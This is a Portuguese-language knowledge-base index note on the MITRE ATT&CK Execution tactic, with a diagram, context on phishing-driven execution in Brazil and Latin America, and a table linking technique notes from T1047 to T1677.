# Execução ```mermaid graph TB A["💥 Vetor de Execução"] --> B["📜 Scripts e Interpreters<br/>T1059 - PowerShell / Bash"] A --> C["🛠️ Servicos do Sistema<br/>T1569 - Service Execution"] A --> D["👤 Interacao do Usuario<br/>T1204 - Malicious File/Link"] A --> E["⏰ Agendamento<br/>T1053 - Scheduled Task"] A --> F["🔌 APIs do Sistema<br/>T1106 - Native API"] B --> G["🚀 Payload Executado<br/>Proximas Etapas do Ataque"] C --> G D --> G E --> G F --> G ``` > [!info] Visão Geral > A tática de Execução (TA0002) engloba as técnicas usadas para rodar código malicioso em um sistema comprometido ou alvo. E frequentemente a segunda etapa após o Acesso Inicial - o atacante precisa executar seu payload para estabelecer presenca, coletar dados ou preparar a persistência. > **Técnicas:** 47 técnicas cobrindo interpreters de script, APIs nativas, servicos do sistema, agendamento de tarefas e execução via interação do usuario. > **Destaque LATAM:** PowerShell e scripts VBA em documentos Office sao os principais vetores de execução em campanhas de phishing contra organizações brasileiras. > [!warning] Contexto Brasil/LATAM > O **T1059 (Command and Scripting Interpreter)** e a técnica de execução mais prevalente em ataques contra o Brasil - especialmente **PowerShell (T1059.001)** e **VBScript (T1059.005)** em campanhas de phishing. Grupos como **Blind Eagle** e distribuidores de RATs bancarios abusam de **User Execution (T1204)** com documentos Word/Excel maliciosos disfarcados de notas fiscais, boletos e comúnicados da Receita Federal para enganar usuarios brasileiros. O **WMI (T1047)** também e amplamente explorado em movimentação lateral em ambientes Windows corporativos. > **47 técnicas** · Execução de código malicioso no sistema alvo - scripts, comandos, APIs do sistema. %% ```dataview TABLE WITHOUT ID link(file.link, title) AS "Nome" FROM "ttp/techniques/execution" WHERE type = "technique" SORT title ASC ``` %% <!-- QueryToSerialize: TABLE WITHOUT ID link(file.link, title) AS "Nota", title AS "Nome" FROM "ttp/techniques/execution" WHERE type = "technique" SORT title ASC --> <!-- SerializedQuery: TABLE WITHOUT ID link(file.link, title) AS "Nota", title AS "Nome" FROM "ttp/techniques/execution" WHERE type = "technique" SORT title ASC --> | Nota | Nome | | ------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------- | | [[t1047-windows-management-instrumentation\|T1047 - Windows Management Instrumentation]] | T1047 - Windows Management Instrumentation | | [[t1053-scheduled-task-job\|T1053 - Scheduled Task/Job]] | T1053 - Scheduled Task/Job | | [[t1053-scheduled-taskjob\|T1053 - Scheduled Task/Job]] | T1053 - Scheduled Task/Job | | [[t1053-002-at\|T1053.002 - At]] | T1053.002 - At | | [[t1053-003-cron\|T1053.003 - Cron]] | T1053.003 - Cron | | [[t1053-005-scheduled-task\|T1053.005 - Scheduled Task]] | T1053.005 - Scheduled Task | | [[t1053-006-systemd-timers\|T1053.006 - Systemd Timers]] | T1053.006 - Systemd Timers | | [[t1053-007-container-orchestration-job\|T1053.007 - Container Orchestration Job]] | T1053.007 - Container Orchestration Job | | [[t1059-command-and-scripting-interpreter\|T1059 - Command and Scripting Interpreter]] | T1059 - Command and Scripting Interpreter | | [[t1059-command-scripting-interpreter\|T1059 - Command and Scripting Interpreter]] | T1059 - Command and Scripting Interpreter | | [[t1059-001-powershell\|T1059.001 - PowerShell]] | T1059.001 - PowerShell | | [[t1059-002-applescript\|T1059.002 - AppleScript]] | T1059.002 - AppleScript | | [[t1059-003-windows-command-shell\|T1059.003 - Windows Command Shell]] | T1059.003 - Windows Command Shell | | [[t1059-004-unix-shell\|T1059.004 - Unix Shell]] | T1059.004 - Unix Shell | | [[t1059-005-visual-basic\|T1059.005 - Visual Basic]] | T1059.005 - Visual Basic | | [[t1059-006-python\|T1059.006 - Python]] | T1059.006 - Python | | [[t1059-007-javascript\|T1059.007 - JavaScript]] | T1059.007 - JavaScript | | [[t1059-008-network-device-cli\|T1059.008 - Network Device CLI]] | T1059.008 - Network Device CLI | | [[t1059-009-cloud-api\|T1059.009 - Cloud API]] | T1059.009 - Cloud API | | [[t1059-010-autohotkey-autoit\|T1059.010 - AutoHotKey & AutoIT]] | T1059.010 - AutoHotKey & AutoIT | | [[t1059-011-lua\|T1059.011 - Lua]] | T1059.011 - Lua | | [[t1059-012-hypervisor-cli\|T1059.012 - Hypervisor CLI]] | T1059.012 - Hypervisor CLI | | [[t1059-013-container-cliapi\|T1059.013 - Container CLI/API]] | T1059.013 - Container CLI/API | | [[t1072-software-deployment-tools\|T1072 - Software Deployment Tools]] | T1072 - Software Deployment Tools | | [[t1106-native-api\|T1106 - Native API]] | T1106 - Native API | | [[t1129-shared-modules\|T1129 - Shared Modules]] | T1129 - Shared Modules | | [[t1203-exploitation-client-execution\|T1203 - Exploitation for Client Execution]] | T1203 - Exploitation for Client Execution | | [[t1203-exploitation-for-client-execution\|T1203 - Exploitation for Client Execution]] | T1203 - Exploitation for Client Execution | | [[t1204-user-execution\|T1204 - User Execution]] | T1204 - User Execution | | [[t1204-001-malicious-link\|T1204.001 - Malicious Link]] | T1204.001 - Malicious Link | | [[t1204-002-malicious-file\|T1204.002 - Malicious File]] | T1204.002 - Malicious File | | [[t1204-003-malicious-image\|T1204.003 - Malicious Image]] | T1204.003 - Malicious Image | | [[t1204-004-malicious-copy-and-paste\|T1204.004 - Malicious Copy and Paste]] | T1204.004 - Malicious Copy and Paste | | [[t1204-005-malicious-library\|T1204.005 - Malicious Library]] | T1204.005 - Malicious Library | | [[t1559-inter-process-communication\|T1559 - Inter-Process Commúnication]] | T1559 - Inter-Process Commúnication | | [[t1559-001-component-object-model\|T1559.001 - Component Object Model]] | T1559.001 - Component Object Model | | [[t1559-002-dynamic-data-exchange\|T1559.002 - Inter-Process Commúnication: Dynamic Data Exchange]] | T1559.002 - Inter-Process Commúnication: Dynamic Data Exchange | | [[t1559-003-xpc-services\|T1559.003 - XPC Services]] | T1559.003 - XPC Services | | [[t1569-system-services\|T1569 - System Services]] | T1569 - System Services | | [[t1569-001-launchctl\|T1569.001 - Launchctl]] | T1569.001 - Launchctl | | [[t1569-002-service-execution\|T1569.002 - Service Execution]] | T1569.002 - Service Execution | | [[t1569-003-systemctl\|T1569.003 - Systemctl]] | T1569.003 - Systemctl | | [[t1609-container-administration-command\|T1609 - Container Administration Command]] | T1609 - Container Administration Command | | [[t1648-serverless-execution\|T1648 - Serverless Execution]] | T1648 - Serverless Execution | | [[t1651-cloud-administration-command\|T1651 - Cloud Administration Command]] | T1651 - Cloud Administration Command | | [[ttp/techniques/execution/t1671-cloud-application-integration.md\|T1671 - Cloud Application Integration]] | T1671 - Cloud Application Integration | | [[t1674-input-injection\|T1674 - Input Injection]] | T1674 - Input Injection | | [[t1675-esxi-administration-command\|T1675 - ESXi Administration Command]] | T1675 - ESXi Administration Command | | [[t1677-poisoned-pipeline-execution\|T1677 - Poisoned Pipeline Execution]] | T1677 - Poisoned Pipeline Execution | <!-- SerializedQuery END --> --- **Navegação:** [[_techniques|Técnicas]] · [[_tactics|Táticas]] · [[_procedures|Procedimentos]]